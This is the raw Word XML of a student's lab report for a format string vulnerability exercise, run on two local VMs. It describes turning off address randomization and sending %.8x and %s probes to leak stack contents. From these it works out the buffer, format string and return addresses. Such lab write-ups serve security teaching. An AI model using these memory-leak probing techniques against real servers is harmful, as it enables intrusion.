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DF27FF" w14:textId="77777777" w:rsidR="00387419" w:rsidRDefault="00387419" w:rsidP="00387419">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CSE643 Lab8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430E20CD" w14:textId="77777777" w:rsidR="00387419" w:rsidRDefault="00387419" w:rsidP="00387419">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Yishi Lu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100D3709" w14:textId="77777777" w:rsidR="00387419" w:rsidRDefault="00387419" w:rsidP="00387419">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10/22/2018</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66051096" w14:textId="77777777" w:rsidR="00424886" w:rsidRDefault="00424886"/>
    <w:p w14:paraId="5E73F48D" w14:textId="546D1CBD" w:rsidR="00A66D10" w:rsidRPr="00A66D10" w:rsidRDefault="00A66D10">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A66D10">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Task1: The Vulnerable Program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2179B04C" w14:textId="77777777" w:rsidR="00A66D10" w:rsidRDefault="00A66D10"/>
    <w:p w14:paraId="78F46349" w14:textId="47200308" w:rsidR="00A66D10" w:rsidRDefault="00BB50DE">
      <w:r>
        <w:t>In this lab, we</w:t>
      </w:r>
      <w:r w:rsidR="00891671">
        <w:t xml:space="preserve"> use two VMs, one for server (IP 10.0.2.5)</w:t>
      </w:r>
      <w:r w:rsidR="00962D25">
        <w:t>, one for attacker (IP 10.0.2.29)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FE78BA" w14:textId="618A46AF" w:rsidR="00363EC8" w:rsidRDefault="00307306">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29348CB4" wp14:editId="6647C230">
            <wp:extent cx="4948556" cy="3160432"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="../../../../Desktop/Screen%20Shot%202018-10-12%20at%208.2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12%20at%208.24.25%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966489" cy="3171885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C6A53B" w14:textId="16CB22D7" w:rsidR="00307306" w:rsidRDefault="00307306">
      <w:r>
        <w:t>screenshot1, information of the server VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBD935D" w14:textId="77777777" w:rsidR="00307306" w:rsidRDefault="00307306"/>
    <w:p w14:paraId="0A045399" w14:textId="273A237C" w:rsidR="00307306" w:rsidRDefault="00307306">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B28896B" wp14:editId="5A856373">
            <wp:extent cx="4917167" cy="3202940"/>
            <wp:effectExtent l="0" t="0" r="10795" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="../../../../Desktop/Screen%20Shot%202018-10-12%20at%208.2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0-12%20at%208.24.50%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18200" cy="3203613"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7007D6" w14:textId="595980D1" w:rsidR="00307306" w:rsidRDefault="00307306">
      <w:r>
        <w:t>screenshot2, information of the attacker VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEF5965" w14:textId="103FD033" w:rsidR="00F15961" w:rsidRDefault="00F15961">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18278EB7" wp14:editId="6A2E60AE">
            <wp:extent cx="5932170" cy="1231900"/>
            <wp:effectExtent l="0" t="0" r="11430" b="12700"/>
            <wp:docPr id="4" name="Picture 4" descr="../../../../Desktop/Screen%20Shot%202018-10-12%20at%208.2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0-12%20at%208.29.58%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2170" cy="1231900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B22F7F6" w14:textId="3DE5BA00" w:rsidR="00F15961" w:rsidRDefault="00F15961">
      <w:r>
        <w:t>screenshot3, we turn off memory randomization on server VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4561F1" w14:textId="77777777" w:rsidR="00F15961" w:rsidRDefault="00F15961"/>
    <w:p w14:paraId="75F993C4" w14:textId="19AF8D91" w:rsidR="00CD136C" w:rsidRDefault="00CD136C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52641D8C" wp14:editId="434B3018">
            <wp:extent cx="4737735" cy="4496335"/>
            <wp:effectExtent l="0" t="0" r="12065" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="../../../../Desktop/Screen%20Shot%202018-10-12%20at%208.2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0-12%20at%208.26.35%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8832" cy="4497376"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3680DDB0" w14:textId="2DDB5A5B" w:rsidR="00CD136C" w:rsidRDefault="00565A77">
      <w:r>
        <w:t>screenshot4</w:t>
      </w:r>
      <w:r w:rsidR="00CD136C">
        <w:t>, we get the server program from lab description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3527F199" w14:textId="77777777" w:rsidR="00F15961" w:rsidRDefault="00F15961"/>
    <w:p w14:paraId="586C5B17" w14:textId="639CED36" w:rsidR="00F15961" w:rsidRDefault="00AF6316">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="094A9507" wp14:editId="1095F321">
            <wp:extent cx="5932170" cy="1247140"/>
            <wp:effectExtent l="0" t="0" r="11430" b="0"/>
            <wp:docPr id="46" name="Picture 46" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%208.4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10-17%20at%208.43.46%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2170" cy="1247140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62133DEE" w14:textId="0AE8D604" w:rsidR="00A40653" w:rsidRDefault="00A40653">
      <w:r>
        <w:t xml:space="preserve">screenshot5, we compile server program </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621E1E10" w14:textId="77777777" w:rsidR="000B4305" w:rsidRDefault="000B4305"/>
    <w:p w14:paraId="38742A86" w14:textId="24F5827C" w:rsidR="000B4305" w:rsidRDefault="00094B3D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D84CCB7" wp14:editId="4481A0F2">
            <wp:extent cx="4595533" cy="1374140"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="47" name="Picture 47" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%208.4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10-17%20at%208.44.4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96952" cy="1374564"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC0E6B1" w14:textId="320BC404" w:rsidR="008A6839" w:rsidRDefault="00094B3D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="665EFE8D" wp14:editId="6F232BDD">
            <wp:extent cx="4623435" cy="1723532"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="48" name="Picture 48" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%208.4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10-17%20at%208.45.0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7507" cy="1725050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="070F0501" w14:textId="66754692" w:rsidR="008A6839" w:rsidRDefault="008A6839">
      <w:r>
        <w:t xml:space="preserve">screenshot6, after we run the server program, we </w:t>
      </w:r>
      <w:r w:rsidR="00094B3D">
        <w:t>send message to it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from the attacker VM. And some information</w:t>
      </w:r>
      <w:r w:rsidR="006E5BD5">
        <w:t xml:space="preserve"> and our </w:t>
      </w:r>
      <w:r w:rsidR="00094B3D">
        <w:t>message</w:t>
      </w:r>
      <w:r w:rsidR="006E5BD5">
        <w:t xml:space="preserve"> are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> printed, so our setup is correct.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2AC9F6" w14:textId="77777777" w:rsidR="00A20AC4" w:rsidRDefault="00A20AC4"/>
    <w:p w14:paraId="6792C7F8" w14:textId="12B76453" w:rsidR="00A20AC4" w:rsidRPr="00252CAE" w:rsidRDefault="00A20AC4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00252CAE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Observation and Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050E5AA0" w14:textId="4DC5839C" w:rsidR="00A20AC4" w:rsidRDefault="00A20AC4">
      <w:r>
        <w:tab/>
        <w:t>In this task, we setup the lab environment. We use two VMs, VM1 for attacker (10.0.2.29), and VM2 for server (10.0.2.5). Then we copy the server program</w:t>
      </w:r>
      <w:r w:rsidR="00094B3D">
        <w:t xml:space="preserve"> and compile it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00094B3D">
        <w:t xml:space="preserve">on the server VM </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(screenshot5). Afterwards, we run the server program, and we send message from attacker </w:t>
      </w:r>
      <w:r w:rsidR="00CF110C">
        <w:t xml:space="preserve">VM </w:t>
      </w:r>
      <w:r>
        <w:t>to the server. As screenshot6 shows, our setup is correct.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E6ABC3" w14:textId="77777777" w:rsidR="0096326D" w:rsidRDefault="0096326D"/>
    <w:p w14:paraId="605836EC" w14:textId="77777777" w:rsidR="0096326D" w:rsidRDefault="0096326D"/>
    <w:p w14:paraId="333FE8D5" w14:textId="5BDFCD0C" w:rsidR="0096326D" w:rsidRPr="0096326D" w:rsidRDefault="0096326D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096326D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Task2: Understanding the Layout of the Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D3F8D7" w14:textId="53798BB3" w:rsidR="0096326D" w:rsidRDefault="00FE4E3A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="359FAE9B" wp14:editId="20721417">
            <wp:extent cx="5939790" cy="1617345"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
            <wp:docPr id="101" name="Picture 101" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%2011.0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8-10-17%20at%2011.02.0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1617345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3595F7" w14:textId="405CFEFA" w:rsidR="00F93909" w:rsidRDefault="00F93909">
      <w:r>
        <w:t>screenshot1, we first run the server program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C70D7C" w14:textId="77777777" w:rsidR="00F93909" w:rsidRDefault="00F93909"/>
    <w:p w14:paraId="4AAE87C0" w14:textId="0BF54AA5" w:rsidR="00F93909" w:rsidRDefault="003C51F2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6216D254" wp14:editId="58B3FCC7">
            <wp:extent cx="5924550" cy="528955"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="51" name="Picture 51" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%208.5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10-17%20at%208.50.2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4550" cy="528955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AF50EF" w14:textId="20D8FD63" w:rsidR="00F93909" w:rsidRDefault="00F93909">
      <w:r>
        <w:t>screenshot2, we make some input message and send it to the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710CC394" w14:textId="2AB47589" w:rsidR="0096326D" w:rsidRDefault="0096326D"/>
    <w:p w14:paraId="3D4CC107" w14:textId="7BB05055" w:rsidR="00091EEF" w:rsidRDefault="00366598">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E97118F" wp14:editId="4919BE8F">
            <wp:extent cx="5932170" cy="1035050"/>
            <wp:effectExtent l="0" t="0" r="11430" b="6350"/>
            <wp:docPr id="12" name="Picture 12" descr="../../../../Desktop/Screen%20Shot%202018-10-20%20at%204.3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0-20%20at%204.30.0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170" cy="1035050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ED9666" w14:textId="07BEAB76" w:rsidR="00F93909" w:rsidRDefault="00F93909">
      <w:r>
        <w:t>screenshot</w:t>
      </w:r>
      <w:r w:rsidR="003C51F2">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003C51F2">
        <w:t>after we send out message on the attacker VM, we go back to the server VM. And we see some addresses are printed</w:t>
      </w:r>
      <w:r w:rsidR="00736609">
        <w:t>. We also see that the 24</w:t>
      </w:r>
      <w:r w:rsidR="00736609" w:rsidRPr="00736609">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00736609">
        <w:t xml:space="preserve"> element (“11111111”) is our written string, so t</w:t>
      </w:r>
      <w:r w:rsidR="00366598">
        <w:t>his is the position of the buf[</w:t>
      </w:r>
      <w:r w:rsidR="00736609">
        <w:t>].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0153487A" w14:textId="77777777" w:rsidR="001A0672" w:rsidRDefault="001A0672"/>
    <w:p w14:paraId="73101794" w14:textId="5E8F70DF" w:rsidR="001A0672" w:rsidRDefault="001A0672">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="124CE37C" wp14:editId="11BB6E9E">
            <wp:extent cx="5932170" cy="1299845"/>
            <wp:effectExtent l="0" t="0" r="11430" b="0"/>
            <wp:docPr id="53" name="Picture 53" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%208.5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10-17%20at%208.54.4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170" cy="1299845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEA142C" w14:textId="607472F2" w:rsidR="001A0672" w:rsidRDefault="001A0672">
      <w:r>
        <w:t>screenshot4, then we send another message to the server VM. At this time, we change the fifth and eighth element (they have same add</w:t>
      </w:r>
      <w:r w:rsidR="00366598">
        <w:t xml:space="preserve">ress 0xbffff0d0) to %s. So their </w:t>
      </w:r>
      <w:r>
        <w:t>values are printed which is our message. Therefore, 0xbffff0d0 is the buf[</w:t>
      </w:r>
      <w:r w:rsidR="00FA057C">
        <w:t>] address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5841DB81" w14:textId="77777777" w:rsidR="00F93909" w:rsidRDefault="00F93909"/>
    <w:p w14:paraId="718EC86A" w14:textId="079689A5" w:rsidR="00F93909" w:rsidRPr="00F93909" w:rsidRDefault="00F93909">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F93909">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Observation and Explanation: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAB8193" w14:textId="38C47CD9" w:rsidR="00F93909" w:rsidRDefault="00F93909">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>To find these three address</w:t>
      </w:r>
      <w:r w:rsidR="00EC3907">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, we need to examine the values which are stored in the stack of the program. we first run the server program (s</w:t>
      </w:r>
      <w:r w:rsidR="00366598">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>creenshot1), and then we sen</w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>d a message from attacker to the server (screenshot2). As the screenshot3 shows, some address values are printed. In the</w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 24</w:t>
      </w:r>
      <w:r w:rsidR="00867126" w:rsidRPr="00867126">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> position of the output, we see 11111111, which means there is the buf[] position, so we know the distance is 24*4 = 96bytes (</w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>the distance between format string and buf[]</w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>. Then we also see some duplicated value 0xbffff0d0, it appears in position 5</w:t>
      </w:r>
      <w:r w:rsidR="00867126" w:rsidRPr="00867126">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>and 8</w:t>
      </w:r>
      <w:r w:rsidR="00867126" w:rsidRPr="00867126">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, so we change the message </w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(change %.8x to %s on 5</w:t>
      </w:r>
      <w:r w:rsidR="00867126" w:rsidRPr="00867126">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>and 8</w:t>
      </w:r>
      <w:r w:rsidR="00867126" w:rsidRPr="00867126">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00366598">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> %.</w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>8x</w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">and send it via attacker VM. As the screenshot4 shows, our input value is printed on them, so we confirm that it is the buf[] address. </w:t>
      </w:r>
      <w:r w:rsidR="005502FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Then</w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> we also get the format string address which is buf[] address </w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 96 = </w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="008F58A2">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>bffff0</w:t>
      </w:r>
      <w:r w:rsidR="00867126">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">70. </w:t>
      </w:r>
      <w:r w:rsidR="00F20319">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> For the return address, </w:t>
      </w:r>
      <w:r w:rsidR="007B2BEC">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>in the graph we see that it is right below the variable msg, so the return address is msg address -</w:t>
      </w:r>
      <w:r w:rsidR="00FD13CE">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B2BEC">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4 (0xbffff090 - 4) = 0xbffff08c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76807FC3" w14:textId="77777777" w:rsidR="008F58A2" w:rsidRDefault="008F58A2">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67B8815C" w14:textId="1B14BE12" w:rsidR="008F58A2" w:rsidRDefault="008F58A2">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>In clear:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7765E525" w14:textId="345098AB" w:rsidR="008F58A2" w:rsidRDefault="008F58A2" w:rsidP="008F58A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Format string address: 0xbffff0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5177FB09" w14:textId="437A6668" w:rsidR="008F58A2" w:rsidRDefault="008F58A2" w:rsidP="008F58A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Return address: </w:t>
      </w:r>
      <w:r w:rsidR="007B2BEC">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0xbffff08c</w:t>
      </w:r>
    </w:p>
